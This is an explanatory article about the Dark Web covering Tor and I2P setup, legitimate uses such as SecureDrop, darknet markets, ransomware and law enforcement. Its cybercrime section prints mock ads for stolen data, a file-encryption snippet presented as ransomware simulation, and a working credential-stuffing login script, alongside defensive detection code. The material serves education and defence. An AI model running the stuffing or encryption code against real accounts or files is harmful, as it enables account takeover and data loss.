
The Dark Web: myths and realities 

Discover the Dark Web, its myths, risks, and how it works. Learn about its hidden markets, privacy tools, and the dangers of cybercrime.


Table of contents

  • The Dark Web: myths and realities 
  • What is the Dark Web? 
  • How does the Dark Web work? 
  • Legitimate uses of the Dark Web 
  • The Dark Web and cybercrime 
  • How to access the Dark Web safely
  • Dark Web vs. Deep Web: understanding the difference 
  • Law enforcement and the fight against Dark Web crime 
  • The future of the Dark Web 

The Dark Web: myths and realities 

The Dark Web is one of the most misunderstood areas of the internet. Often associated with criminal activity, hacking, and illicit markets, it has also become a space for privacy advocates, journalists, and whistleblowers seeking anonymity. But what really happens in these hidden corners of the web? Is it as dangerous as people think? 

This article explores the Dark Web, separating facts from myths, examining its legitimate and illegal uses, and shedding light on the tools that allow access to this secretive part of the internet. 

What is the Dark Web?

The Dark Web refers to a part of the Deep Web that is intentionally hidden and requires special software to access.

Unlike the Surface Web, which includes indexed sites found via search engines like Google, the Deep Web consists of unindexed content such as private databases, academic journals, and intranet systems.

The Dark Web is a small section of the Deep Web, but it is unique because it requires anonymizing tools like Tor (The Onion Router) or I2P (Invisible Internet Project) to navigate. 

How does the Dark Web work? 

The Dark Web relies on encryption technologies and anonymous routing to protect the privacy of users and websites. Unlike the Surface Web, which operates using standard protocols like HTTP/HTTPS, the Dark Web functions on specialized networks such as Tor (The Onion Router) and I2P (Invisible Internet Project).

These networks use anonymous domain addresses (such as .onion for Tor and .i2p for I2P) and route traffic through multiple encrypted nodes, making it extremely difficult to trace the origin of a connection. 

Tor: the onion routing system 

The Tor network is the most widely used method to access the Dark Web. It is based on a multi-layered encryption system, similar to an onion’s structure.

When a user sends a request to a .onion website, the traffic is routed through several Tor nodes (relays) before reaching the destination. 

Here are the three main types of Tor nodes: 

  • Entry Node (Guard Node)
    Receives the initial connection and encrypts it, hiding the user’s real IP. 
  • Middle Node
    Transfers traffic between different nodes without knowing the original source or final destination. 
  • Exit Node
    Decrypts the message and forwards it to the target website while keeping the user anonymous. 

Each node only knows the previous and next node in the chain, ensuring that no single entity can trace the entire connection. 
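The layering can be modelled in a few lines. The sketch below is an added example, not code from the original article or from the Tor Project: the sender wraps a request in one layer per relay, and each relay that peels its layer learns only the next hop. The relay names, keys, destination and the toy cipher are assumptions made for illustration; real Tor uses fixed-size cells and keys negotiated per circuit.

```python
import hashlib
import json

# Constructed circuit: (relay name, symmetric key shared with the sender)
ROUTE = [("entry", b"key-entry"), ("middle", b"key-middle"), ("exit", b"key-exit")]
DESTINATION = "example.org:443"      # constructed destination
PAYLOAD = b"GET / HTTP/1.1"          # constructed request


def toy_cipher(key: bytes, data: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream. Toy stand-in, NOT Tor's cipher."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def wrap(route, destination: str, payload: bytes) -> bytes:
    """Sender side: build the onion from the innermost layer outwards."""
    next_hops = [name for name, _ in route[1:]] + [destination]
    cell = payload
    for (_, key), next_hop in reversed(list(zip(route, next_hops))):
        layer = json.dumps({"next": next_hop, "data": cell.hex()}).encode()
        cell = toy_cipher(key, layer)
    return cell


def peel(key: bytes, cell: bytes):
    """Relay side: remove one layer, revealing the next hop and an opaque blob."""
    layer = json.loads(toy_cipher(key, cell))
    return layer["next"], bytes.fromhex(layer["data"])


def walk_circuit(route, cell: bytes):
    """Pass the cell along the route and record what each relay learns."""
    views = []
    for name, key in route:
        next_hop, cell = peel(key, cell)
        views.append((name, next_hop))
    return views, cell


if __name__ == "__main__":
    views, delivered = walk_circuit(ROUTE, wrap(ROUTE, DESTINATION, PAYLOAD))
    for relay, next_hop in views:
        print(f"{relay} forwards to {next_hop}")
    print("delivered:", delivered)
```

Only the last relay in the chain sees the request itself, which is why traffic leaving the network should still be protected with TLS.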

Example: configuring Tor on Linux 

To connect to the Tor network using a Linux terminal, you can install and start Tor with: 

bash

sudo apt update && sudo apt install tor -y
sudo systemctl start tor

To verify if the Tor connection is active, you can use cURL with the Tor proxy: 

bash 

curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/

If the connection is successful, the site will confirm that you are browsing via Tor.

Example of a .onion address 

Websites on the Dark Web use .onion domains, which cannot be accessed with regular browsers like Chrome or Firefox unless they are configured to use Tor.

Here is an example of a .onion domain: 

http://duskgytldkxiuqc6.onion/ 

This was (or still is) the Tor version of DuckDuckGo, a privacy-focused search engine. 
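A 16-character address like the one above is in the older v2 format, which current Tor releases no longer support; v3 addresses are 56 base32 characters that encode a public key, a two-byte checksum and a version byte. The checker below is an added example, not code from the original article: it classifies an address and verifies the v3 checksum, which catches mistyped or tampered links before they are used. The sample v3 address is built from a constructed 32-byte key and does not point to a real service.

```python
import base64
import hashlib
import re
from urllib.parse import urlsplit

V2_LABEL = re.compile(r"[a-z2-7]{16}")
V3_LABEL = re.compile(r"[a-z2-7]{56}")


def _checksum(pubkey: bytes, version: bytes) -> bytes:
    # v3 rule: first two bytes of SHA3-256(".onion checksum" | pubkey | version)
    return hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]


def encode_v3(pubkey: bytes) -> str:
    """Build a v3 address from a 32-byte public key (used here for sample data)."""
    version = b"\x03"
    raw = pubkey + _checksum(pubkey, version) + version
    return base64.b32encode(raw).decode().lower() + ".onion"


def classify(url: str) -> str:
    """Return not-onion, v2-obsolete, malformed, bad-version, bad-checksum or v3-valid."""
    host = (urlsplit(url).hostname or url).lower().rstrip(".")
    if not host.endswith(".onion"):
        return "not-onion"
    # Subdomains such as "www." are allowed; only the last label carries the key
    label = host[: -len(".onion")].split(".")[-1]
    if V2_LABEL.fullmatch(label):
        return "v2-obsolete"
    if not V3_LABEL.fullmatch(label):
        return "malformed"
    raw = base64.b32decode(label.upper())      # 56 chars decode to exactly 35 bytes
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != b"\x03":
        return "bad-version"
    return "v3-valid" if checksum == _checksum(pubkey, version) else "bad-checksum"


if __name__ == "__main__":
    sample_v3 = "http://" + encode_v3(bytes(range(32))) + "/"   # constructed key
    for url in ("http://duskgytldkxiuqc6.onion/", sample_v3,
                "https://check.torproject.org/"):
        print(classify(url), url)
```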

I2P: the alternative Dark Web network 

I2P (Invisible Internet Project) is another anonymous network, optimized for peer-to-peer communication rather than web browsing. Unlike Tor, which is mainly used to access hidden websites, I2P is designed for secure messaging, file sharing, and decentralized applications. 

Sites within I2P do not use .onion domains but instead have .i2p addresses, and traffic is routed through bidirectional encrypted tunnels, making tracking even more difficult. 

Example: setting up I2P on Linux 

To install and start I2P on Linux, you can use the following commands: 

bash 

sudo apt update && sudo apt install i2p -y 

i2prouter start 

Once installed, the I2P router can be accessed via the local interface at: 

http://127.0.0.1:7657

How Dark Web traffic is routed 

Traffic on the Dark Web does not follow a direct path between the user and the server. Instead, it is routed through multiple anonymous nodes to obscure both the sender and the receiver. 

To visualize how a Tor connection works, consider the following scenario: 

  • Alice wants to visit a .onion site. 
  • Her traffic is sent through Node A (Entry) → Node B (Middle) → Node C (Exit).
  • The website receives the request and responds via the same path in reverse. 

At no point does the .onion site know Alice’s real IP address, and Alice has no knowledge of the server’s true location. 

Example: viewing a Tor circuit in Python 

For those interested in tracking Tor circuits, here’s a simple Python script using the stem library to interact with the Tor network: 

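python

from stem.control import Controller

# Requires "ControlPort 9051" and a control password to be set in torrc
with Controller.from_port(port=9051) as controller:
    controller.authenticate(password='mypass')  # Replace with your Tor password

    for circuit in controller.get_circuits():
        print("Circuit ID:", circuit.id)

        # Each path entry is a (fingerprint, nickname) pair for one relay
        for fingerprint, nickname in circuit.path:
            print(" -> Node:", fingerprint, nickname)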

This script prints the Tor nodes through which traffic is routed in real-time. 

Legitimate uses of the Dark Web 

Despite its notorious reputation, the Dark Web is not solely a hub for criminal activity. Instead, it serves as a valuable tool for privacy, cyber security, and freedom of expression, especially in countries with government censorship and mass surveillance.

Here are some of the most important legitimate uses of the Dark Web, along with real-world examples of platforms and tools designed for privacy and security. 

Secure communication for journalists and whistleblowers 

One of the most critical uses of the Dark Web is protecting journalistic sources and whistleblowers, who expose corruption, human rights violations, and illegal activities within governments or corporations. 

SecureDrop: the anonymous tip system 

SecureDrop is a secure communication platform accessible only via Tor. Developed by the Freedom of the Press Foundation, it is used by major media organizations, including: 

  • The Guardian;
  • The New York Times;
  • The Washington Post.

Using SecureDrop, whistleblowers can submit confidential documents and tips anonymously without fear of being traced. 

Example of a SecureDrop address on Tor:

http://secrdrop5wyphb5x.onion/ 

Real case: Edward Snowden and the Dark Web 

In 2013, Edward Snowden, a former NSA analyst, used anonymity tools similar to SecureDrop to send classified documents to journalists from The Guardian and The Washington Post. These documents revealed the PRISM mass surveillance program. 

Without technologies like Tor and the Dark Web, it would have been nearly impossible for Snowden to leak these documents while remaining anonymous. 

Access to uncensored information 

In many countries with authoritarian governments, Internet access is heavily monitored and restricted. Independent news platforms, social media, and even Wikipedia are often blocked by governments.

The Dark Web provides a way for people to access uncensored news and information through special Tor mirrors of major websites. 

BBC Tor mirror: free news for everyone 

To ensure access to free news in censored regions such as China, Iran, and Russia, BBC has launched a .onion version of its website, accessible only through Tor.

BBC Tor mirror: 

http://bbcnewsv2vjtpsuy.onion/ 

Other archival and documentation projects, like The Internet Archive, also have Tor mirrors to prevent censorship. 

Privacy and secure browsing 

Many people use the Dark Web to protect their online privacy and prevent their data from being tracked by corporations and governments.

Facebook on Tor: a private social network

Even Facebook acknowledges the need for privacy and has launched a .onion version of its platform. This allows users in heavily restricted countries to access Facebook anonymously, bypassing local censorship.

Facebook on Tor: 

https://www.facebookcorewwwi.onion

Using Facebook via Tor ensures that governments and ISPs cannot track user activity. 

DuckDuckGo: the privacy-focused search engine 

DuckDuckGo, a search engine known for its privacy-first approach, has a .onion version that allows users to browse the web without being tracked by Google or other mainstream search engines. 

DuckDuckGo on Tor: 

http://3g2upl4pq6kufc4m.onion/

Cyber security and ethical hacking communities 

The Dark Web hosts various forums and communities dedicated to cyber security, cryptography, and ethical hacking.

These forums are used by security experts to share knowledge about vulnerabilities, privacy techniques, and defense against cyber threats.

Examples of ethical hacking forums on Tor 

  • Dread
    A privacy-focused alternative to Reddit with discussions on cyber security and anonymity. 
  • The Hub
    A forum dedicated to ethical hackers and infosec professionals. 

Note: Some forums mix ethical discussions with illegal topics, so users must differentiate between white-hat hacking and cybercrime. 

Secure cryptocurrency transactions 

While Bitcoin is partially traceable, Monero (XMR) is designed for maximum anonymity in transactions. It is often used for:

  • Anonymous donations to human rights organizations;
  • Purchasing legal goods from privacy-focused marketplaces;
  • Paying for VPN services or other digital privacy tools. 

Monero: the privacy coin 

While Bitcoin is partially traceable, Monero (XMR) is designed for complete anonymity. It is commonly used for: 

  • Supporting activists and journalists in authoritarian countries;
  • Funding open-source privacy projects;
  • Making secure transactions without revealing personal identities. 

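Example of a Monero transaction via CLI

bash

monero-wallet-cli --daemon-host node.moneroworld.com

Then, at the wallet prompt, send funds with the transfer command, where ADDRESS is the recipient's address and AMOUNT is the amount in XMR:

transfer ADDRESS AMOUNT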

The Dark Web and cybercrime 

Alongside its legitimate uses, the Dark Web is also a hub for criminal activities, including illegal marketplaces, hacking services, and identity theft.

The anonymity provided by networks like Tor and I2P makes it difficult for law enforcement to track down cybercriminals operating in these hidden spaces. 

In this section, we will explore the most common cybercrimes on the Dark Web, providing real-world examples, case studies, and even code snippets to illustrate how cybercriminals operate. 

Illegal marketplaces on the Dark Web 

Silk road: the first darknet drug market 

One of the first and most infamous illegal marketplaces on the Dark Web was Silk Road, launched in 2011 by Ross Ulbricht (also known as Dread Pirate Roberts).

This platform allowed users to buy and sell drugs, weapons, fake documents, and hacking services using Bitcoin for anonymous transactions. 

In 2013, the FBI shut down Silk Road and arrested Ulbricht, sentencing him to life in prison. However, new markets quickly emerged: 

  • AlphaBay (2014-2017)
    Replaced Silk Road but was taken down by the FBI after the arrest of its founder Alexandre Cazes.
  • Hansa Market (2015-2017)
    Shut down by Dutch police after months of covert investigation. 
  • Empire Market (2018-2020)
    Disappeared in an exit scam, where administrators stole users’ funds before shutting down. 

Example of a darknet market listing 

On a Dark Web forum, an advertisement for stolen data might look like this: 

NEW DUMP: 500K Credit Cards - Fresh from 2024 Breach   

Visa, Mastercard, Amex   

USA, EU, Asia   

Fullz (Name, DOB, SSN, Address)   

Price: 0.02 BTC per card   

Contact: encrypted_chat@onionmail.com

Note: Cybercriminals often use encrypted messaging apps and cryptocurrency payments to avoid being tracked. 

Ransomware-as-a-Service (RaaS) 

A major criminal business on the Dark Web is Ransomware-as-a-Service (RaaS), which allows non-technical criminals to launch ransomware attacks by purchasing pre-built malware. 

Notorious ransomware groups 

  • REvil (Sodinokibi)
    Responsible for high-profile attacks, including JBS Foods and Kaseya.
  • LockBit
    A ransomware group active since 2019, offering customizable ransomware kits for affiliates. 
  • Conti
    Specializes in double extortion, where stolen data is leaked if the ransom is not paid. 

Example of a RaaS advertisement on the Dark Web 

Cybercriminal groups sell ransomware kits on underground forums like this: 

LOCKBIT 3.0 RaaS - Start Making Money Today! 

Undetectable payloads   

Works on Windows & Linux   

Affiliate program - Earn 70% profit!   

Join our private Telegram group for details

Note: Many ransomware groups communicate through private Telegram and Tox chat groups to recruit new members. 

How does a ransomware attack work? 

A typical ransomware attack follows these steps: 

  • Infection
    The ransomware is distributed via phishing emails, exploit kits, or compromised RDP servers.
  • File encryption
    The malware encrypts all files using advanced encryption algorithms like AES-256.
  • Ransom demand
    The victim receives a ransom note demanding payment in Bitcoin or Monero for the decryption key. 

Example: simulating file encryption in Python 

python

from cryptography.fernet import Fernet

# Generate an encryption key
key = Fernet.generate_key()
cipher = Fernet(key)

# Encrypt a sample file
file_path = "important_document.txt"
with open(file_path, "rb") as file:
    encrypted_data = cipher.encrypt(file.read())

# Save the encrypted file
with open(file_path + ".enc", "wb") as file:
    file.write(encrypted_data)

print(f"File {file_path} successfully encrypted!")
print(f"Decryption Key: {key.decode()}")  # In real ransomware, the key is only stored by the attacker

This script is for educational purposes only! Using ransomware for criminal activity is illegal. 
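On the defensive side, the file-encryption step is what monitoring tools look for: files whose contents suddenly become statistically random. The triage check below is an added example, not part of the original article; it also handles the case of the script above, whose Fernet output is base64 text and therefore stays under a plain entropy threshold. File names, sample contents and thresholds are constructed assumptions.

```python
import base64
import binascii
import hashlib
import math
import re
from collections import Counter

MIN_SAMPLE = 2048      # below this size, entropy estimates are too noisy
THRESHOLD = 7.5        # bits per byte; uniformly random data approaches 8.0
B64_TEXT = re.compile(rb"[A-Za-z0-9_\-+/]+={0,2}")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


def looks_encrypted(data: bytes) -> bool:
    """True if the content is near-uniform, directly or after base64 decoding."""
    if len(data) < MIN_SAMPLE:
        return False
    if shannon_entropy(data) >= THRESHOLD:
        return True
    # Base64 text cannot exceed about 6 bits per byte, so decode and re-measure
    text = data.strip()
    if not B64_TEXT.fullmatch(text):
        return False
    try:
        raw = base64.urlsafe_b64decode(text)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= MIN_SAMPLE and shannon_entropy(raw) >= THRESHOLD


def _pseudo_random(blocks: int) -> bytes:
    # Deterministic stand-in for ciphertext so the example is reproducible
    return b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(blocks))


# Constructed samples: a plain document, raw ciphertext, a Fernet-style token
SAMPLES = {
    "report.txt": b"Quarterly report: revenue up 4 percent.\n" * 120,
    "report.txt.locked": _pseudo_random(128),
    "report.txt.enc": base64.urlsafe_b64encode(b"\x80" + _pseudo_random(128)),
}


def triage(samples: dict) -> list:
    """Names of samples that look encrypted, sorted."""
    return sorted(name for name, data in samples.items() if looks_encrypted(data))


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: {shannon_entropy(data):.2f} bits/byte, flagged={looks_encrypted(data)}")
```

Compressed archives and media files are also high-entropy, so this signal is best combined with others such as a burst of rewrites or renames across many files.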

Identity theft and stolen data markets 

Each year, billions of personal records are stolen in data breaches and sold on Dark Web forums.

Real-world data breaches 

  • Cambridge Analytica (2018)
    Over 87 million Facebook profiles compromised. 
  • Marriott (2018-2019)
    Hackers stole data from 500 million customers, including passport numbers and credit cards.
  • T-Mobile (2021)
    Cybercriminals sold 40 million customer records on the Dark Web.

Example of a stolen database for sale on a darknet forum 

NEW LEAK: T-Mobile Customer Data 2023 

40M Records   

Name, SSN, DOB, Address, Phone, Email   

Encrypted Credit Card Details   

Price: 0.1 BTC   

Contact: darknet_seller@protonmail.onion

Note: Cybercriminals often offer monthly subscriptions to access the latest stolen databases. 

How are passwords stolen? 

One common method for stealing passwords is credential stuffing, where hackers use databases of previously leaked passwords to gain access to other accounts. 

Example: credential stuffing attack using Python 

python

import requests

# List of stolen email and password combinations
credentials = [("user1@example.com", "password123"), ("victim@example.com", "123456")]

# Automated login attempts
for email, password in credentials:
    response = requests.post("https://example.com/login", data={"email": email, "password": password})

    if "Welcome" in response.text:
        print(f"Successful login for {email} with password {password}")
    else:
        print(f"Failed attempt for {email}")

Using scripts to hack into accounts is illegal. This code is for educational purposes only. 
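In authentication logs this pattern stands out as one source failing logins for many different accounts within a short window, which distinguishes it from a user mistyping a password or from brute force against a single account. The detection sketch below is an added example, not part of the original article; the log format, IP addresses, accounts and thresholds are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: "<UTC timestamp> <source IP> <account> <OK|FAIL>"
SAMPLE_LOG = (
    # One source trying six different accounts within ten seconds
    [f"2024-05-01T10:00:{2 * i:02d}Z 203.0.113.7 user{i}@example.com FAIL" for i in range(6)]
    # One source hammering a single account (brute force, not stuffing)
    + [f"2024-05-01T10:01:{5 * i:02d}Z 192.0.2.44 admin@example.com FAIL" for i in range(6)]
    # A legitimate user mistyping a password, then succeeding
    + ["2024-05-01T10:02:00Z 198.51.100.20 alice@example.com FAIL",
       "2024-05-01T10:02:09Z 198.51.100.20 alice@example.com OK"]
)


def parse(line: str):
    """Split one log line into (timestamp, source IP, account, result)."""
    ts, ip, account, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, account, result


def detect_stuffing(lines, window=timedelta(seconds=60), min_accounts=5):
    """Return {source IP: most distinct accounts failed within any one window}."""
    recent = defaultdict(deque)       # source IP -> recent (timestamp, account) failures
    flagged = {}
    for ts, ip, account, result in sorted(parse(line) for line in lines):
        if result != "FAIL":
            continue
        events = recent[ip]
        events.append((ts, account))
        # Drop failures that have aged out of the sliding window
        while ts - events[0][0] > window:
            events.popleft()
        distinct = len({acct for _, acct in events})
        if distinct >= min_accounts:
            flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


if __name__ == "__main__":
    for ip, accounts in detect_stuffing(SAMPLE_LOG).items():
        print(f"possible credential stuffing from {ip}: {accounts} accounts in 60s")
```

Rate limiting per source, multi-factor authentication and checking new passwords against known breach lists address the same risk at the login endpoint.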

How to access the Dark Web safely 

For those curious about exploring the Dark Web, it’s essential to take security precautions. The most common way to access it is through the Tor Browser, which anonymizes user traffic.

However, even with Tor, risks remain. Malicious links, phishing scams, and law enforcement monitoring make it a potentially dangerous space. 

To enhance security, users should: 

  • Use a VPN (Virtual Private Network) alongside Tor for additional anonymity;
  • Avoid clicking on unknown .onion links;
  • Never share personal information;
  • Keep software updated to prevent exploits and vulnerabilities. 

Despite these precautions, venturing into the Dark Web without proper knowledge can expose users to cyber threats. 

Dark Web vs. Deep Web: understanding the difference 

Many confuse the Dark Web with the Deep Web, but they are distinct concepts.

The Deep Web encompasses all content not indexed by standard search engines, including medical records, financial statements, and private databases. The Dark Web, on the other hand, is intentionally hidden and accessible only through specific tools like Tor.

Example
Checking your email inbox, logging into a bank account, or accessing a company’s internal network happens on the Deep Web. These are not illicit activities but merely private parts of the internet. The Dark Web represents a small, encrypted portion where anonymity is the primary focus.

Law enforcement and the fight against Dark Web crime 

Authorities worldwide continuously monitor and disrupt Dark Web criminal activities. Agencies like the FBI, Europol, and Interpol conduct operations to shut down illegal marketplaces, seize assets, and arrest key figures behind cybercriminal networks. 

Example
Operation Onymous led to the seizure of multiple illicit websites, while the takedown of AlphaBay in 2017 was a significant victory against Dark Web crime. However, criminals often relocate their activities to new platforms, making law enforcement efforts an ongoing challenge. 

Governments are also cracking down on cryptocurrency transactions linked to illicit activity. While Bitcoin was once the preferred currency on Darknet markets, privacy-focused cryptocurrencies like Monero are gaining popularity due to their enhanced anonymity. 

The future of the Dark Web 

As cyber security measures evolve, so does the Dark Web. Governments and organizations continue to strengthen anti-cybercrime laws, while privacy advocates push for tools that protect online freedoms. The balance between security and anonymity will shape the future of the Dark Web, making it a constantly shifting landscape. 

For ethical hackers, journalists, and cyber security professionals, understanding the Dark Web is crucial. Whether used for privacy or criminal activity, it remains a powerful—yet controversial—part of the internet. 


Questions and answers

  1. Is accessing the Dark Web illegal? 
    No, using the Dark Web is not illegal in most countries. However, engaging in criminal activities on it is against the law. 
  2. Can I be tracked while using the Dark Web? 
    Although Tor provides anonymity, law enforcement agencies have methods to track users, especially if they make mistakes like revealing personal information. 
  3. What’s the difference between the Dark Web and Deep Web? 
    The Deep Web consists of unindexed, private content, while the Dark Web is a small, encrypted portion requiring special tools to access. 
  4. Is it safe to buy products from the Dark Web? 
    No. Many Darknet markets are scams, and law enforcement regularly seizes illicit marketplaces, leading to arrests and lost funds. 
  5. How do journalists use the Dark Web? 
    Journalists use platforms like SecureDrop to communicate securely with whistleblowers and sources in authoritarian regions. 
  6. Can I access social media on the Dark Web? 
    Yes, there are Tor versions of some social media sites, including Facebook’s .onion site, designed for privacy-focused users. 
  7. What are the risks of using Tor? 
    Risks include malware, phishing scams, and monitoring by law enforcement if engaging in illegal activities. 
  8. How do criminals use cryptocurrencies on the Dark Web? 
    Cybercriminals use Bitcoin, Monero, and other privacy coins for anonymous transactions, often for illegal goods and services. 
  9. Has law enforcement successfully shut down Dark Web markets? 
    Yes, markets like Silk Road, AlphaBay, and Hansa Market have been shut down, but new ones often replace them. 
  10. Is the Dark Web getting bigger? 
    Yes, with increasing concerns over online privacy and censorship, more users explore Dark Web tools for secure communication and data protection. 